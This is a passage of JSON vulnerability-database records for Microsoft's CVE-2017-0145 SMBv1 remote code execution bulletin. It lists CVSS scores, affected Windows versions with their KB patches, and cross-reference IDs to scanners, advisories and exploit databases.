"SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 3187754", "KB4014077", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": 
"KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems 
Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 
for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", 
"1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KB4014077", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", 
"1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4014077", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": 
"KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 